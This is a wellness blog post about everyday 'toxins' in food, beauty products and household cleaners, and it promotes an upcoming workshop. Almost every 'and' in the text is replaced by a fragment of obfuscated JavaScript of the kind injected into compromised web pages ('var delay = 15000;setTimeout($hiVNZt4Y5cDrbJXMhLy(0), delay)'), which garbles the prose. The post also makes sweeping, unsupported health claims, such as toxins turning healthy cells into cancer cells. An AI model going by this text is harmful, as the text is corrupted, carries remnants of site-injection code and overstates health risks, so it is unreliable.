It’s time to talk toxins.

Toxins are a very complicated subject that can easily overwhelm you. But it’s crucial you understandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and where you are overloading your body with toxins andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and what you can do about it.

Exposure to toxins can cause you to gain weight, can turn a healthy cell into a cancer cell, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and can effect your moods leading to depression andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and anxiety.

On March 10th I will be doing a workshop in my office to help you understandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and how you can minimize your toxic load. Until then, stay tuned to my emails for the next several weeks as I teach what to look for in your beauty products, foods, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and household cleaners.

Today I want to give you a basic understandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anding of where you are getting these toxins.

1. Your food - If you are not reading labels, you need to be. Just because it is allowed in a food product doesn't mean it's safe for you. The challenge is that many people don't know what the words on the label mean. I will be going over the most toxic ingredients over the next few weeks, so stay tuned.

2.Your beauty products - What you put on your skin andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and hair matters. Many beauty products contain endocrine disruptors that are linked to breast cancer. These disruptors also can cause depression andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and weight gain. There are two helpful apps that will help you tell how toxic your beauty products are; Skin Deep App andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Think Dirty. Check them out andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and rate your products.

3.Your household products - This is probably one of the greatest sources of toxins you are exposed to. Dishwashing soaps, laundry detergents, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and cleaners will have a damaging effect on your health. The Environmental Working Group has done a great job to help us understandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and this complicated subject. Here is a link to there website:

As many of you know, I take a multipronged approach to health. It's not just one thing that destroys or rebuilds your health. There are several things in your environment that will break it down. Toxins is a big one andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and probbably the most misunderstood.

Be sure to follow me on social media as I am always posting information about different food andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and beauty products that are great for your health.

Look at your environment today andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and see what toxins you can start pulling out. It's a process that can take months to accomplish. Be patient.

Hope that helps. Have an amazing day!
